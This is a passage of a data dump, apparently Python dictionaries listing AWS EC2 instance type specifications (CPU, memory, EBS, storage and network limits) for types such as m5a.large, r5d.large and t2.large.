2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 8192, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15360, 'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'unsupported', 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.large', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15360}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 32, 'Disks': [{'SizeInGB': 32, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 15616, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 15616}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 425, 'BaselineThroughputInMBps': 53.125, 'BaselineIops': 3000, 'MaximumBandwidthInMbps': 425, 'MaximumThroughputInMBps': 53.125, 'MaximumIops': 3000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 1, 'DefaultThreadsPerCore': 2, 'ValidCores': [1], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 75, 'Disks': [{'SizeInGB': 75, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 650, 'BaselineThroughputInMBps': 81.25, 'BaselineIops': 3600, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 10, 'Ipv6AddressesPerInterface': 10, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 8192, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['partition', 'spread'], 'InstanceType': 't2.large', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1}, 'MemoryInfo': {'SizeInMiB': 8192}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 'Ipv4AddressesPerInterface': 12, 'Ipv6AddressesPerInterface': 12, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': True, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['i386', 'x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 2, 'DefaultCores': 2, 'DefaultThreadsPerCore': 1, 'SizeInMiB': 4096, 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Low to Moderate', 'MaximumNetworkInterfaces': 3}], 